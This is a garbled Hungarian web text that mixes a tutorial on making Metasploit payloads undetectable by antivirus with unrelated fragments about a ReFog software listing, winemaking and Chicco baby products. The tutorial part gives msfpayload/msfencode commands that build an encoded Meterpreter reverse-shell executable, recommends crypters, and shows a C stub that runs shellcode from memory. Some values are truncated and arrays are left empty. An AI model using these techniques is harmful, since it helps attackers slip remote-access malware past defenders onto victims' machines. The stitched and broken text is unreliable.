De azért ez sem olyan rossz eredmény: Na és most nézzük hogy hogy lehet "kézzel" készíteni egy 0/46-os payloadot. FUD Payload 0. 1: A metasploit beépített titkosító alkalmazását fogjuk használni, az msfencode-ot. root@kali:# msfpayload windows/meterpreter/reverse_tcp LHOST=192. 11 R | msfencode -t exe -o -e x86/shikata_ga_nai -c 5 [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5) Látszik hogy ez elég gyenge, 35/45: Hol lehet a baj? Titkosítottuk a fájlunkat, mégis ilyen rossz eredményt kaptunk! Az az ok hogy a vírusirtók ismerik az msfencode által gyártott fájlok szignatúráját. Ezt mi sem bizonyítja jobban mint az alábbi kis kísérlet. Titkosítsunk msfencode-al egy sima fájlt! root@kali:# echo simafile | msfencode -e generic/none -t exe > [*] generic/none succeeded with size 9 (iteration=1) Láthatjuk hogy semmilyen káros kód nincs a fájlban mégis ilyen eredményt kaptunk.
00 MB Verzió: 4. 63 Utolsó frissítés: 4/12/2008 Operációs rendszer: Windows XP, Windows Vista, Windows NT, Windows 2003 Támogatott nyelvek: Német, Angol Gyártó: ReFog Software Letöltések száma (Magyar): 9 Letöltések száma (világszerte): 792 Információ a gyártóról
Ezt követően indul a munka, a szedők (lányok, asszonyok) görbe késsel, kacorral (szőlőmetsző kés) vagy metszőollóval vágják le a fürtöt és gyűjtőedénybe teszik. Amikor az edény megtelik a szedő kiált a puttonyosnak, hogy vigye a szőlőt a présházhoz. Ezt követően el kell távolítani egymástól a bogyót és a kocsányt, majd jön a zúzás, mely a bogyók héját repeszti fel. Fontos, hogy a magától kicsorgó must a legjobb minőségű. A maradékot külön kell kipréselni, mivel értéke az előbbitől gyengébb, íze fanyarabb. A mustot a cefrétől mielőbb külön kell választani és erjesztő hordókba tölteni. A vörösbor készítése kiegészül még néhány művelettel: a szőlő húsa nem tartalmaz színanyagot, csak a bogyó héja, emiatt a vörösbor készítésénél a kocsánytól való elválasztást és a zúzást héjon erjesztés követi. A rozébor annyiban különbözik a vörösbortól, hogy 1-2 nap héjon való áztatásra vagy erjesztésre van szükség szén-dioxid atmoszférában, mivel így megőrizhetőek a fajtára jellemző illat- és íz anyagok.
18. 16:38 Hasznos számodra ez a válasz? Kapcsolódó kérdések:
De mint láthatjuk megéri, mert elég jó eredményt kaptunk. Itt van egy másik megoldás, ez egy metasploit script, ezt nem teszteltem le: 3. Kód összezavarás: Ez a legkifinomultabb technika. Annyiból áll hogy mint ahogy a nevében is benne van össze fogjuk zavarni a kódot. Titkosítjuk, stb. Ehhez is vannak nagyon jó kis programok. Ezekből fogok most bemutatni néhányat, utána pedig megnézzük hogy hogy lehet "kézzel" titkosítani a kódot! :) AVoid: Letölthető innen: Ez a kis script az msfencode-ot használja egy két finomítással. A használatához telepíteni kell a mingw32 fordítót. Ha nincs feltelepítve az alábbi paranccsal tudjuk telepíteni: apt-get install mingw32 A használatára külön nem térnék ki mert nagyon egyszerű. És mint láthatjuk a detektálási arány is elég jó: (a oldalt használtam mert ez nem teszi közzé a sample-t) Itt még meg kell említenem az ún. Cryptereket. Ezeknek két fajtája van UD(undetectable) és FUD(fully undetectable). Én az Aegis Cryptert fogom használni. Letölthető innen: Ez egyébként binder-t is tartalmaz, meg még sok egyéb kis extrát... :) Sajnos a publikus verzióval nem lehet elérni FUD-ot.
:) // Ide jönnek a random karakterek unsigned char padding[]=; // A Meterpreter kód ide unsigned char payload[]=; // Betöltjük a Meterpretert a memóriába int main(void) { ((void (*)())payload)();} Én egész jó eredményt kaptam::) Nagyon sok eszközt teszteltem, de kb. hasonló eredményeket kaptam mint az AVoid-nál. Böngészésére ajánlom még az alábbi linkeket: Marosi Attila előadása a 2013 Ethical Hacking Konferencián(Ez az előadás ihlette a cikket): Veil:(Ez egy nagyon jó kis eszköz, az egyetlen ok amiért nem raktam bele a cikkbe mert nem tudtam működésre bírni sem a py2exe-t, sem a pyinstaller-t a linuxomon... :( de érdemes megnézni! ) UPDATE! Azóta sikerült működésre bírnom, és cikk is született róla. :) Metasm AV Bypass: XOR encrypt: A videó fájlai: AV Sandbox Evasion: Bypassing Symantec Endpoint Protection: Shellcodeexec:
15 kg testsúlyig Teljes leírás Alapadatok Cikkszám 504939 Gyártó CHICCO Garancia 1 éves Termék átlagos értékelése Mások ezt is vásárolták!
80 kg Szabályozható magasság: 8 pozíció Számára: Lány Szín: Rózsaszín Teljes leírás Alapadatok Cikkszám 810217 Gyártó CHICCO Garancia 1 éves Termék átlagos értékelése Mások ezt is vásárolták!
-3 éves korig ajánlott! -Összecsukva extra kicsi:kb 26 cm széles Elfogyott